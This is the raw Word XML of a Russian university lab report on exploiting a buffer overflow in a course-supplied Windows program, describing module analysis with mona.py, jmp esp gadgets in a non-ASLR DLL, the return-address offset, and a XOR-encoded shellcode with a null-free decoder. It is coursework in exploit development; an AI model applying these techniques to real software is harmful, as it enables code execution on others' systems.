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45D05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39131A5D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764437F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—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE570CD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Институт прикладной математики и механики</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BE21AC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  <w:spacing w:val="62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>Кафедра «Информационная безопасность компьютерных систем»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6FFE65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EA4338F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BDCC2D2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1D8643E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1B40E17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D8A72B1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C9C29F6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F576257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C0F49EB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1B1BC59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25617C6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6443460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2EF0FC0">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="24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0666FBD">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:cap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ЛАБОРАТОРНАЯ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РАБОТА №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2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D81AA4">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:spacing w:val="62"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F969B34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  <w:b/>
          <w:highlight w:val="yellow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Исследование подходов, применяемых при эксплуатации уязвимостей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»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D0BC26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE82313">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia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по дисциплине «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Модели безопасности компьютерных систем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»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6090A627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7268FDB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3807221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71C6879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1058FDC">
      <w:pPr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10CD379">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4B8A2B">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4527"/>
          <w:tab w:val="left" w:pos="7407"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="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гр.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5151003/30802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   Гопта В.Д.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3719B50A">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5313"/>
          <w:tab w:val="left" w:pos="7407"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:firstLine="0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                              &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>подпись</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A39FFB6">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="24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</w:p>
    <w:p w14:paraId="6982E4D5">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="24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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45288785">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4527"/>
          <w:tab w:val="left" w:pos="7407"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:contextualSpacing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Жуковский Е.В.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794B88B9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5313"/>
          <w:tab w:val="left" w:pos="7407"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567" w:firstLine="851"/>
        <w:jc w:val="left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                                &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>подпись</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489B7B2B">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
          <w:tab w:val="left" w:pos="7560"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="200" w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing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56EC9D9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bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5889032A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3960"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="478396A6">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3960"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="233DDB6A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3960"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76DF9FDC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3960"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344C1887">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E3A8818">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24E7A7B5">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="062F88AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:lef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Санкт-Петербург</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0B5D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1134" w:right="850" w:bottom="1134" w:left="1134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202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>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F740CAC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="clear" w:pos="845"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="846" w:leftChars="354" w:hanging="138" w:hangingChars="4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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ЕЛЬ РАБОТЫ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D3BBFC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Изучение способов эксплуатации уязвимостей и механизмов противодействия.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2457231D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851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8F921D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1227" w:leftChars="376" w:hanging="475" w:hangingChars="148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ЗАДАЧИ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066DC723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При проведении исследования безопасности программного обеспечения одним из этапов работы является проверка найденных ошибок на возможность их эксплуатации. Для этого осуществляется написание, так называемых proof-of-concept эксплойтов (POC), демонстрирующих возможность эксплуатации найденной уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6785E4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Одной из наиболее распространенных ошибок является переполнение буфера. Оно может происходить как на стеке (stack overflow), так и на куче (heap overflow). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F14ED40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рамках лабораторной работы необходимо осуществить эксплуатацию уязвимости, найденной в исполняемом файле в лабораторной работе №2. Необходимо реализовать полезную нагрузку в соответствии с указанным вариантом задания, которая будет выполняться в результате эксплуатации уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2511257E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ходе выполнения лабораторной работы необходимо выполнить следующие действия:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234E5B90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Использовать полученные от преподавателя файлы для лабораторной работы №1 в соответствии со своим вариантом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C356762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Получить вариант задания, в котором описан функционал полезной нагрузки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A870EF9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Изучить защитные механизмы, затрудняющие эксплуатацию уязвимостей (DEP, ASLR, GS, Security Cookies, SMEP, SAFESEH, SEHOP и другие).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF58A84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Изучить техники эксплуатации уязвимостей и способы обхода защитных механизмов (ret2libc, ROP, Stack Pivoting, Heap Spray  и другие).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE92A67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Используя скрипт mona.py для отладчиков Immunity Debugger/WinDBG  или другой с аналогичной функциональностью осуществить получение списка загруженных в процесс модулей, не использующих технологию рандомизации адресов. Реализовать скрипт для отладчика.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA4DB69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Найти в динамических библиотеках без рандомизации адресов опкоды инструкций, необходимых для передачи управления (call esp, jmp esp, …) на полезную нагрузку. Реализовать для этих целей скрипт для отладчика (Immunity Debugger/WinDBG/IDA Pro).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B60C85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Провести эксплуатацию найденной уязвимости, с использованием полезной нагрузки (shellcode) в соответствии с выданным вариантом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCB7A4B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Эксплуатацию уязвимости осуществлять под ОС семейства Windows версии не ниже Windows 7 x64. При эксплуатации запрещено изменение исполняемого файла, запуск сторонних исполняемых файлов, либо выполнение консольных команд. Полезная нагрузка должна быть написана на языке ассемблера, либо на языке C с использованием приемом разработки базонезависимого кода. Полезная нагрузка должна непосредственно использовать необходимые для выполнения целевых действий WinAPI функции, и не должна использовать WinExec/ShellExecute и т.п. (т.е., она не должна быть универсальной и использовать cmd или другие сторонние или штатные утилиты).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F296E9E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В отчете необходимо привести следующую информацию:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7840AAAA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перечень динамических библиотек, не использующих рандомизацию адресов;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690B66DB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код, осуществляющий эксплуатацию уязвимости (exploit) с комментариями;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F63992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схема эксплуатации уязвимости (описание стека при эксплуатации, описание приемов обхода защиты); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063EB184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формат файла, используемого для эксплуатации, с указанием значения полей, приводящих к исполнению кода;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B320A87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код полезной нагрузки в бинарном виде с комментариями;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC27416">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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код полезной нагрузки на языке ассемблера / языке C с комментариями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2EC153">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="708" w:leftChars="0" w:firstLine="6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ru-RU"/>
        </w:rPr>
        <w:t>ХОД РАБОТЫ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F49124C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708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3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Анализ исполняемого файла с помощью </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mona.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151028C0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Используя плагин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mona.py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был получен список всех модулей загруженных в  процесс (рисунки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-2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).  Оказалось, что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ASLR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не использует только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func.dll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. Также получены адреса инструкций, содержащихся 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func.dll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рисунки 3-5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F4083D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7E44A3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012180" cy="1478280"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="9" name="Изображение 9" descr="{0244F385-87BB-4065-8230-784422FE026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{0244F385-87BB-4065-8230-784422FE026B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EAF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1 - С</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пи</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>сок</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> загруженных в процесс модулей</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5930F3C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556760" cy="876300"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="2" name="Изображение 2" descr="{516CE3AF-0ADF-45CC-8716-57CB262FC6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516CE3AF-0ADF-45CC-8716-57CB262FC65F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ACA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2 - С</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пи</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>сок</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> загруженных в процесс модулей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продолжение таблицы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</w:p>
    <w:p w14:paraId="096B94F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848100" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="5" name="Изображение 5" descr="{DC0AEA31-6226-4E4D-95B4-A63521CDED0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DC0AEA31-6226-4E4D-95B4-A63521CDED03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1B9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3 - Адреса инструкций из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func.dll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передающих управление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esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26851E1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4335780" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="6" name="Изображение 6" descr="{5BD43B67-C273-42F6-9648-9A3DD93F906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5BD43B67-C273-42F6-9648-9A3DD93F906E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B91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4 - Адреса инструкций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call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eax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func.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C13E5D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421380" cy="281940"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="7" name="Изображение 7" descr="{A15B7C39-2606-4F06-A195-6DBEB38135C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{A15B7C39-2606-4F06-A195-6DBEB38135C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76BF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5 - Проверка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call eax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 найденному адресу</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD0533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1C00863A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708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3.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Реализация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D023C2D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 анализе исполняемого файла было замечено, что можно переполнить буфер из функции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vuln_func()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если изменить в входном файле поле, задающее максимальное число байт, которое можно записать. Оно находится по смещению 8 байт от начала входного файла, а по смещению 54 байта начинаются полезные данные файла, что можно понять, если изучить фрагменты исходного кода, представленные на рисунках с 6 по 10.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0544A7DD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2773680" cy="2164080"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Изображение 11" descr="{CAA16EEC-9EF3-471C-9746-08E7247047C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{CAA16EEC-9EF3-471C-9746-08E7247047C8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5DEE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6 -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read_config()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131CB73C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C0DED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6296025" cy="4303395"/>
            <wp:effectExtent l="0" t="0" r="13335" b="9525"/>
            <wp:docPr id="10" name="Изображение 10" descr="{7AE66E9F-AB36-4CEB-90FE-7061300AB61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7AE66E9F-AB36-4CEB-90FE-7061300AB61E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C31C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7 - Копирование заголовка в структуру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cfg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7242B9D2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EFC4BE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867400" cy="624840"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="Изображение 14" descr="{3309C597-E81B-4910-85EE-2F2E2065989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{3309C597-E81B-4910-85EE-2F2E20659899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DAD7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Рисунок 8 - Описание структуры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cfg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секции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.bss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401AC40E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467100" cy="2773680"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="8" name="Изображение 8" descr="{2FC4F2E0-D41D-4AB8-A22F-592DB953A1E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2FC4F2E0-D41D-4AB8-A22F-592DB953A1EA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10B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9 - Использование константы из заголовка входного файла</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23842759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1E1F75">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708" w:firstLine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3794760" cy="1257300"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="13" name="Изображение 13" descr="{CBED5A0E-CBEC-4442-9468-9617C63B5CE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{CBED5A0E-CBEC-4442-9468-9617C63B5CEF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04F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10 - Константа ограничивает число байт, которые можно записать</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289BBA4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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C21397A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708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 анализу стека (рисунки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) был найден участок стека, в котором хранится адрес возврата из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vuln_func()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Видно, что этот участок лежит следом за массивом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на момент снимка в массив было скопировано 2500 символов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\x62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и те символы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\x62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которые попали в кадр, можно считать «хвостом» массива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 что будет перезатерт при записи за пределы массива. Таким образом, в массиве по смещению 2512 байт будет можно разместить 4 байта, которые затрут адрес возврата, после копирования в память программы, что приведет к ошибке. Для примера эти 4 байты были записаны в входном файле как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\xBA\xB0\xBA\xB0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На рисунке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можно видеть, что программа передала исполнение на адрес 0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xB0BAB0BA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CF5B00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2948940" cy="1379220"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="16" name="Изображение 16" descr="{A3115B7A-9E24-4E90-A401-1866B5CC720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A3115B7A-9E24-4E90-A401-1866B5CC7209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026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Вызов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vuln_func()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7104A24F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3070860" cy="1706880"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="17" name="Изображение 17" descr="{76E108B9-982B-472C-B518-8FBC7A08924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{76E108B9-982B-472C-B518-8FBC7A089248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3FAB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Адреса возврата из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vuln_func()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parse_string()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, сохраненный в стеке</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AF3C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CCB5A7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543675" cy="697230"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3810"/>
            <wp:docPr id="18" name="Изображение 18" descr="{171A6062-7182-4B29-9122-7A257069BB8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{171A6062-7182-4B29-9122-7A257069BB8B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1DB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Попытка выполнить инструкцию по адресу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0xB0BAB0BA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBB3F0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2ED4F2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57B192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094DB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Следом за этими 4-мя байтами должна идти полезная  нагрузка, на которую нужно передать управление. Так как массив  сохраняется в стеке, то и передавать управление понадобится на стек. Так как после выхода из функции значение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esp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восстанавливается и начинает указывать на память в стеке, которая идет сразу после адреса возврата, то нужен гаджет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jmp esp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». Его адрес можно взять из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func.dll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которая не использует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ASLR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5F4433A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Бинарный код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приложении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он представлен в ассемблере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который выполняет запись имен файлов и папок из папки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C:\Windows\*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содержит нулевые байты, что не позволит скопировать весь код с помощью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snprintf().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Поэтому было принято решение зашифровать код. Если «проиксорить» все байты кода на байт, которого нет в коде, то в полученном зашифрованном коде не будет нулевых байтов. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556357E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Также нужен дешифратор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приложение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A)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 Он не должен содержать нулевых байт. Можно заметить, что инструкции типа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add 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байтовое число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 будут содержать 3 нулевых байта. Поэтому такие инструкции заменены на инструкции типа «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sub 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&gt;, &lt;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минус байтовое число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&gt;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».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407D027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Дешифратор должен понять, по какому адресу в стеке начинаются зашифрованные данные.  В предлагаемой реализации эти данные помещены сразу после дешифратора, поэтому для определения их адреса дешифратору достаточно знать свой размер в байтах и адрес, по которому декодер хранится в стеке. Адрес начала дешифратора можно получить через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esp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415FB41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завершения процедуры дешифрования управление передается сразу же на декодированный бинарный код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098178B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Бинарный код полезной нагрузки эксплойта представлен в приложении С, то есть декодер и зашифрованный код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27868F8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1629EAFD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1133" w:leftChars="0" w:hanging="425" w:firstLineChars="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ВЫВОД</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C378E0E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результате выполнения лабораторной работы изучены техники написания эксплойтов и техники обхода защит от исполнения произвольного кода.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B61285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нахождения пути эксплуатации был проведен анализ бинарного кода исполняемого файла, анализ используемых им модулей, а также анализ формата файла.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081A4BEC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Получены навыки написания шеллкода и реализации средства обхода ограничений на содержание шеллкодом «запрещенных» байт.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br w:type="page"/>
